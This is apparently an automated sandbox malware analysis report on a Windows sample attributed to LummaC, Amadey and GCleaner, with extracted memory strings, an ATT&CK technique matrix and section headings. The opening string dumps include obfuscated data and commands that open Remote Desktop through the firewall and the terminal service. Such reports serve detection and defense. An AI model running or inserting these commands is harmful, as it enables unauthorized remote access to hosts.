vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice
Source: rapes.exe, 00000014.00000003.2240830062.0000000004D40000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: net start termservice
Source: rapes.exe, 00000014.00000003.2240830062.0000000004D40000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit seta131b127e996a898cd19ffb2d92e481b006700e5a2ab05704bbb0c589b88924d0921553d1dc176b36780331821e85866812981MJ5SM vtQw2sMQSrPj==LQXfPMklgFTVLZjr1JL2QsCffy==NIWoNG==UoSbcxLpJITieG==LINieG==YcAROJQf3kWVYN==ccxm0NDq3VfgUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMyMZVkZG==UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3WNEhggzOaDTpdFrEg7yb2VADUTJ8ddIXgy==UcNjYSTaJs0zMDHIRBjPKFZxQ8F8UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764XlMycdNk0wooQxGbUxBl0TAdfVK=UQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTF3RTMugkTpdCXieqDng764UV9A5DZzZNB3VS9hfEubRj7p1JLwhB==JLNJSLAMYi7BSRvCLT==Xuxmdq==Uu1JWq==RQNKaMIWddEWcSIWbTEWYccWYNAWcwEWdMWWZwSWYNQWbxQWbS5Wc S=YTBb0sWgfEv3YZvmeFVigLyZYTBb0sWgfEu=YSpfdsWgfEu=Ztw=ZJw=ZJA=ZJE=TMxfc7==axJQdtfrPu==axJQdxD2Pw6=ZN bZwpiYSTacxEnbNFfecdmLTxRbMMWPwE+PwI+LRtieM5lflKqKokhIm==fq==JdNkbNH5PG==cS bcwnvQg3fbDu=aSNoccMoQxGpZDvpRSNQUcwWeVXgU0jwfJLrX16deu==UxBl0TAdfSPcdDD QLRrVRHcY07hdEbeepK=QNRfdcv=SSxpdwMug0r0IBve0j==RLFvWq==Uwxk0wvcY0TedUHmfKa=Rw1 ew0uMDbgYd==QLRxMpQmWw0W2UvOZTLYepbYjV==QcdQ0wMi3U3fZUG=Tc1oew0qUS1mbw0vQS1jcSIrVSdkSwMi3U3fZUG=MtwoNpHXRhaZON==ccA=dSA=QS1kewMqhAZPeUziQlrri1yRdVsl6kGwZc1ocISg2VPcOvzfd6Ls4LGphRRxEPQuLISjMIRpDGhtcSWW3U3VLRPme6rth7mRdU0yHfrnbTBjMMIdhEC2ID3edZK7NrS9gEvmHvrnaMpbccwp3RYdI7SARS0qhETpdzZRg0rjTnC9fFsw4TDidwdlc90r21PgdzZwfKzj311EFeRODGgjMIRpPQY=LISDD7==PTF d RtLchm0m==QS1kewMqhAZPeUziQlrfhMCjdUEl7Dbwb91UMN5ZhwZhb0HqN0LwgLWl100oSTG=URdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8QZ7qeKLY42KF1USpQBDwbNtRewMuXkDoZN==QS1jdxMW3VHJYTZiYMB 0wMi30fkajrpdZVthMGpf1I57k45eNgmNJzvRBSXNwe2NYY=LNNkbMEr3ESoURdJWuMJ1CLWckHidqHBg76Rfk0wNZL1XuFlcdIuf0v8VT3mfJLi0rmb2U0gJXZPVvBFUvoSWSPATYu=URdJWuMJ1CLqbkPvd5nR42RnPBwgNZLzdcd 0NE9UkDuaTLBc0DugLGW0DQtSDLwVcda0M0FVy==XtsmNtr=RwNcZNMohDLgdEPmdp4xQqiJ2VEz5EL1aM1kRwNcZNMohDLgdEPmdp4xQqmJ2VEz5EL1aM1kUQ1wWv5xYiT8TTjgepZxg70R0D5t5jHwdTE7UbI9U1TtcjTrfIPjhsOge0V=UxBl0xMfhC3cbTS=M snPG==M soN7==M snO7==M soOG==QTNodcMqhCHWaTvhXq==O gWcdNk0wooQxGpZUfiLSk7IdJ8dSkneUvnIz7jKFZngXB I9scK9sWeUZgb0TXKGueOnZ82EMwBx==J9Q7SN9lhAG=I9scK9su3U2bIsQcJq==Uw1T0NAveETnbz3igJK=LMNU0MEXhEjqbkzsdJbhjXCp2USz7DLAaM6k0MHcPSXkbDSdKj==I7==cS RewIrh02bLUKdN0GeRF==cTIZdm==ccxk0w0pSSNVZc0dgkObTDD2d6LY2KCp2UozRTG=MtsmNtrWQRi=MtsmNtrWQhG=MtsmNtrWQhK=MtsmNtrWQ0W=ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/0%x%xabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 Systemimage/jpeg0123456789\/ NtUnmapViewOfSectionntdll.dllrunas, r/.\10111213 0x00000000fDenyTSConnectionsSYSTEM\CurrentControlSet\Control\Terminal Servernetsh advfirewall firewall set rule group="Remote Desktop" new enable=Yessc config termservice

Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AF1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,		0_2_00AF1204
Source: C:\Users\user\Desktop\5c9465cda4.exe	Code function: 0_2_00AF1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,		0_2_00AF1806

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	2 Valid Accounts	11 Native API	1 Scripting	1 Exploitation for Privilege Escalation	11 Disable or Modify Tools	21 Input Capture	2 System Time Discovery	1 Remote Desktop Protocol	11 Archive Collected Data	14 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Data from Local System	21 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	11 Scheduled Task/Job	2 Valid Accounts	2 Valid Accounts	3 Obfuscated Files or Information	Security Account Manager	1 System Service Discovery	SMB/Windows Admin Shares	1 Email Collection	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	2 PowerShell	11 Scheduled Task/Job	21 Access Token Manipulation	32 Software Packing	NTDS	3 File and Directory Discovery	Distributed Component Object Model	21 Input Capture	115 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	11 Registry Run Keys / Startup Folder	312 Process Injection	1 Timestomp	LSA Secrets	229 System Information Discovery	SSH	3 Clipboard Data	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	11 Scheduled Task/Job	1 DLL Side-Loading	Cached Domain Credentials	961 Security Software Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	11 Registry Run Keys / Startup Folder	11 Masquerading	DCSync	371 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	2 Valid Accounts	Proc Filesystem	3 Process Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	371 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	11 Application Window Discovery	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	21 Access Token Manipulation	Network Sniffing	1 System Owner/User Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement
Network Security Appliances	Domains	Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	312 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Mail Protocols	Exfiltration Over Unencrypted Non-C2 Protocol	Firmware Corruption
Gather Victim Org Information	DNS Server	Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Mshta	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	DNS	Exfiltration Over Physical Medium	Resource Hijacking

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report 5c9465cda4.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Threatname: Amadey

Threatname: GCleaner

Yara Signatures

PCAP (Network Traffic)

Dropped Files

Memory Dumps

Unpacked PEs

Other

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Phishing

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Windows Analysis Report
5c9465cda4.exe